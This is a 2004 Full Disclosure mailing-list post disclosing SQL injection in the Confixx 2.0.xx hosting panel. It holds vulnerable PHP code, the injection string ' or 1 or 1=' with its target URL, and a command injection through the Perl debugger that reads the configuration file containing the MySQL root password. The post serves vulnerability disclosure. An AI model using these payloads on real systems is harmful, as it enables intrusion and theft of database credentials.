Full Disclosure mailing list archives
Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW
From: checker () mail krefeld schulen net
Date: 9 Mar 2004 09:24:47 -0000
SQL-Injections in Confixx 2.0.xx // reading MySQL Root-PW include("auth.php"); db_connect($db_host, $db_user, $db_pass); $id = db_query("select count(datenbank) as mysql from mysql_datenbanken where kunde = '$PHP_AUTH_USER'"); $werte = db_fetch_array($id); $mysql = $werte["mysql"]; $id = db_query("select dbname from mysql_datenbanken where kunde = '$PHP_AUTH_USER' and datenbank = '$db'"); --------------------------------^^^^^^^^^ $db --> unchecked Value ____ /user/db_mysql_loeschen2.php?db=1 SELECT db FROM sqldb WHERE user='$USER' AND db='$formular_wert' using: ' or 1 or 1=' the SQL query look like : SELECT db FROM sqldb WHERE user='$USER' AND db='' or 1 or 1='' /user/db_mysql_loeschen2.php?db=' or 1 or 1=' ______ Confixx Perl Debugger using: ; /bin/cat location_of_Confixx_config_file to read the config with MySQL Root-PW _______ wkr _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW checker (Mar 09)
- Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW Tim (Mar 09)
- Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW Tim (Mar 09)
- <Possible follow-ups>
- Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW checker (Mar 10)